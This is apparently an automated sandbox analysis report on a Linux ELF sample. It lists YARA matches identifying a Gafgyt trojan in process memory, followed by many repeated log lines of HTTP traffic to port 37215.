              Source: Process Memory Space: 0lMevtsZn2.elf PID: 5458, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: 0lMevtsZn2.elf PID: 5464, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: classification engineClassification label: mal88.troj.linELF@0/0@23/0

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: unknownNetwork traffic detected: HTTP traffic on port 53030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51506 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42616 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51358 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46382 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34632 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34268 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54358 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54260 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41528 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47190 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34688 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34444 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55106 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50570 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58548 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43992 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55526 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53114 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37122 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35334 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53982 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37954 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46072 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48642 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50910 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39754 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36294 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44304 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54260 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46072 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39754 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55106 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50570 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58548 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55526 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34688 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43992 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34444 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41528 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53982 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37122 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48642 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35334 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53114 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37954 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51358 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44304 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36294 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50910 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46382 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47190 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54358 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42616 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51506 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34632 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46072 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33086 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50764 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33086 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60714 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37298 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39172 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44588 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60188 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53888 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41020 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58168 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41480 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57338 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43662 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56774 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41628 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47632 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38840 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53008 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34106 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43570 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44748 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39092 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39262 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34256 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60888 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44488 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51894 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37550 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53280 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46146 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48622 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45372 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41624 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53964 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47884 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52550 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51524 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56450 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52860 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44022 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33086 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51894 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50764 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50910 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60188 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52860 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55106 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50570 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58548 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60714 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37298 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34444 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43992 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55526 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34688 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39172 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44588 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41480 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53888 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57338 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56774 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41628 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47632 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34106 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38840 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53008 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44304 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36294 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50910 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44748 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39092 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51894 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39262 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60188 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52860 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60888 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60424 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53978 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53280 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48622 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41808 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59936 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41624 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49046 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60052 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47884 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53964 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36128 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48740 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56450 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46072 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47190 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46382 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60424 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50910 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54358 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34632 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51506 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50764 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60424 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59936 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41808 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60052 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48740 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36128 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37298 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60714 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34106 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53008 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38840 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47632 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41628 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41480 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53888 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44588 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39172 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39092 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39262 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53280 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41624 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60888 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53964 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48622 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50910 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48740 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36128 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60052 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59936 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41808 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60424 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55106 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50570 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58548 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43992 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55526 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34444 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34688 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37830 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43424 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60714 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37298 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46072 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39172 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41480 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38840 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41628 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47632 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53888 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44588 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34106 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53008 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39092 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39262 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60888 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41624 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53280 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53964 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48622 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38456 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45458 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53850 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60308 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50910 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46382 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47190 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48180 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45458 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39478 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46708 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59776 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34632 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43926 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39592 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53004 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37242 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55398 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55966 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53014 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35614 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50358 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47950 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43810 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46492 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49618 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53046 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48520 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51506 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60424 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41808 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59936 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60052 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36128 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48740 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45458 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45540 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58914 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39162 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55710 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41676 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52580 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37830 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38456 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60308 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48180 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39478 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46708 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59776 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52580 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55710 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39162 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41676 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39592 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46492 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49618 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53014 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43810 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53004 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53046 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50358 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35614 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37242 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47950 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45540 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52760 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37792 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44616 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39532 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42304 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40054 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34146 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42938 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42938 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48106 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52580 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41676 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39162 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37298 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60714 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42938 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34106 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39478 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48180 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41628 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41480 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53008 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47632 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38840 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39092 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39262 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53888 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44588 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39172 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46708 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52760 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41624 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60888 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53964 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48622 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44616 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40054 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37792 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50910 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55106 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50570 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45540 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53046 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49618 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46492 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43810 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47950 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48740 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36128 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53004 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53014 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37242 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50358 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35614 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 37215
